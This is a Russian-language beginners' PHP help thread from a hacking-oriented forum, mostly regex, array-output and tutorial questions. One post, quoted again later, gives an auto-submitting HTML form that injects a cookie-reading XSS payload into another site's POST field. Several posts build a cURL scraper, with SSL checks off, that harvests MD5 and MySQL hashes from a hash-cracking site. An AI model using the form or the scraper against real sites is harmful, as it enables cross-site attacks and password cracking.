[php] Новичкам: задаем вопросы

Pashkela · 19 Dec 2008

<form NAME="xss" method='post' action='http://blablabla.ru/index.php&post=on'>
<input type='hidden' name='name' value='"><script>alert(document.cookie)</script>'>
<input type='submit'>
</form>
<script>
document.xss.submit();
</script>

MaTpOc · 19 Dec 2008

life_is_shit said:

http://www.php.net/download-docs.php
удачи=)
Click to expand...

мне бы попроще и на русском

Pashkela · 19 Dec 2008

http://ru2.php.net/manual/ru/index.php

[dei] · 19 Dec 2008

MaTpOc said:

Где можно скачать норм учебник по пхп с 0, так чтоб без лишнего и одним архивом?
Click to expand...

http://softtime.ru/info/bookphp.php?down=bookphp.zip

Rainbow · 19 Dec 2008

php.su

#Wolf# · 20 Dec 2008

b3 said:

#Wolf#,

PHP:

<?php $str = '2008-08-18(43):3557d8eff41195a6e33efb18d356a3e5::'; preg_match('#[0-9a-f]{32}#i',$str, $matches); print_r($matches); echo $matches[0]; ?>

Это вопрос по части регулярок, задаються сюда)
http://forum.antichat.ru/thread92492.html
Click to expand...

не универсально. а если мускульные хеши?
и список очень большой с хешкрекинга

Gifts · 20 Dec 2008

#Wolf#

PHP:

$str = '2008-08-18(43):3557d8eff41195a6e33efb18d356a3e5::'; preg_match('#^[^:]+:([^:]+):#m',$str, $matches); print_r($matches); echo $matches[1];

.:EnoT:. · 20 Dec 2008

Для тех кто в бронепоезде, напоминаю что для регулярок есть спец. тема!

Mixon · 20 Dec 2008

Pashkela said:

<form NAME="xss" method='post' action='http://blablabla.ru/index.php&post=on'>
<input type='hidden' name='name' value='"><script>alert(document.cookie)</script>'>
<input type='submit'>
</form>
<script>
document.xss.submit();
</script>
Click to expand...

И опять же он ЛИШЬ переходит по етой ссылке http://blablabla.ru/index.php&post=on НЕ ОТПРАВЛЯЯ ДЕННЫЕ С СТАРНИЦЫ!!!

[dei] · 20 Dec 2008

Mixon said:

И опять же он ЛИШЬ переходит по етой ссылке http://blablabla.ru/index.php&post=on НЕ ОТПРАВЛЯЯ ДЕННЫЕ С СТАРНИЦЫ!!!
Click to expand...

Ты вообще понимаешь как работает метод POST ?

Mixon · 20 Dec 2008

Да

KaZ@NoVa · 20 Dec 2008

Просто надо знать волшебное слово, все делается без особых проблем. Благо классов уже понаписанно достаточно.
Так что 3 строки - и вы в посте

Mixon · 20 Dec 2008

Не очень понял о чём ты говоришь,ты вопше ето к кому пишешь?

Doom123 · 20 Dec 2008

rushter $pock[1] тоже массив т.к это preg_match_all
делай print_r($pock);

Mixon · 20 Dec 2008

Mixon said:

Может мой вопрос не сильно по теме,но как можно имитировать POST в ссылке,вопше делают так например

http://blablabla.ru/index.php&post=on

ето передается как бы в POST запросе переменная post со значением on вот только далекооо не всегда так выходит...подскажите плз...
Click to expand...

никто незнает чтоли?(((

b3 · 20 Dec 2008

m0Hze

у меня file_get_contents() с https неочень хотел работать.

PHP:

<?php set_time_limit(0); $url = "https://hashcracking.info/index.php?4"; $ref = "https://hashcracking.info/index.php"; $ua = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 AdCentriaIM/1.7 Firefox/3.0.4"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $ua); curl_setopt($ch, CURLOPT_REFERER, $ref); curl_setopt($ch, CURLOPT_COOKIEJAR, "./cook"); curl_setopt($ch, CURLOPT_COOKIEFILE, "./cook"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $res = curl_exec($ch); preg_match_all('#[0-9a-f]{32}#i', $res, $matches); print_r($matches); ?>

[dei] · 20 Dec 2008

1) Почитай сначала про многомерные массивы http://ua.php.net/manual/ru/language.types.array.php
2) http://ua.php.net/manual/ru/book.curl.php

FeoЩту · 20 Dec 2008

1) Почиму при замене print_r($matches); на echo $matshes
Я получаю Array?
Click to expand...

print_r() выводит информацию о переменной в удобочитаемом виде.
echo — Выводит одну или более строк

Какбе вывсести все ето без массива как в print_r а одним столбиком.
Click to expand...

PHP:

foreach($arr as $val) { echo $val.'<br />'; }

Chaak · 20 Dec 2008

m0Hze said:

Вообщем чтото странное =)
Решил тот код,что мне помогли написать на редидущей странице,немного модернизировать...
И вот что получилось:

PHP:

<? echo('<center><form method = "POST"><input type = "radio" name "system" value = "md5">MD5 <input type = "radio" name "system" value = "mysql">MySQL <input type = "radio" name "system" value = "mysql5">MySQL5 and SHA-1 <input type = "submit" value = "Грабим!"></center></form>'); switch($_POST['system']){ case 'md5' : { $hash = "#[0-9a-f]{32}#i"; $url = "https://hashcracking.info/index.php?4"; }break; case 'mysql' : { $hash = "#[0-9a-f]{16}#i"; $url = "https://hashcracking.info/index.php?3"; }break; case 'mysql5' : { $hash = "#[0-9a-f]{40}#i"; $url = "https://hashcracking.info/index.php?5"; }break; default : exit(); break; } $da = $url; set_time_limit(99999); $ref = "https://hashcracking.info/index.php"; $ua = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 AdCentriaIM/1.7 Firefox/3.0.4"; $ch = curl_init($da); curl_setopt($ch, CURLOPT_USERAGENT, $ua); curl_setopt($ch, CURLOPT_REFERER, $ref); curl_setopt($ch, CURLOPT_COOKIEJAR, "./cook"); curl_setopt($ch, CURLOPT_COOKIEFILE, "./cook"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $res = curl_exec($ch); preg_match_all("$hash", $res, $matches); foreach($matches[0] as $val) { echo $val.'<br />'; } ?>

При нажатии на кнопку,можно сказать сраница обновляеца.Но ницего не происходит.Вроде ошибок явных в коде нет,но чтото не так.Возможно переменым все время присваеваеться значение default? Переписывал всю системыу на "if" теже результаты =(
Click to expand...

PHP:

name "system"

Надо name="system"

PHP:

case 'mysql5' : { $hash = "#[0-9a-f]{40}#i"; $url = "https://hashcracking.info/index.php?5"; }break;

Извращение, фигурные скобки не обязательны

MaTpOc · 20 Dec 2008

что за пхп4, пхп5, чем они отличаются?

[php] Новичкам: задаем вопросы

Pashkela Динозавр

MaTpOc Elder - Старейшина

Pashkela Динозавр

[dei] Active Member

Rainbow Elder - Старейшина

#Wolf# Elder - Старейшина

Gifts Green member

.:EnoT:. Сексуальное чудовище

Mixon Elder - Старейшина

[dei] Active Member

Mixon Elder - Старейшина

KaZ@NoVa Elder - Старейшина

Mixon Elder - Старейшина

Doom123 Elder - Старейшина

Mixon Elder - Старейшина

b3 Banned

[dei] Active Member

FeoЩту New Member

Chaak Elder - Старейшина

MaTpOc Elder - Старейшина

Useful Searches

[php] Новичкам: задаем вопросы

Pashkela Динозавр

MaTpOc Elder - Старейшина

Pashkela Динозавр

[dei] Active Member

Rainbow Elder - Старейшина

#Wolf# Elder - Старейшина

Gifts Green member

.:EnoT:. Сексуальное чудовище

Mixon Elder - Старейшина

[dei] Active Member

Mixon Elder - Старейшина

KaZ@NoVa Elder - Старейшина

Mixon Elder - Старейшина

Doom123 Elder - Старейшина

Mixon Elder - Старейшина

b3 Banned

[dei] Active Member

FeoЩту New Member

Chaak Elder - Старейшина

MaTpOc Elder - Старейшина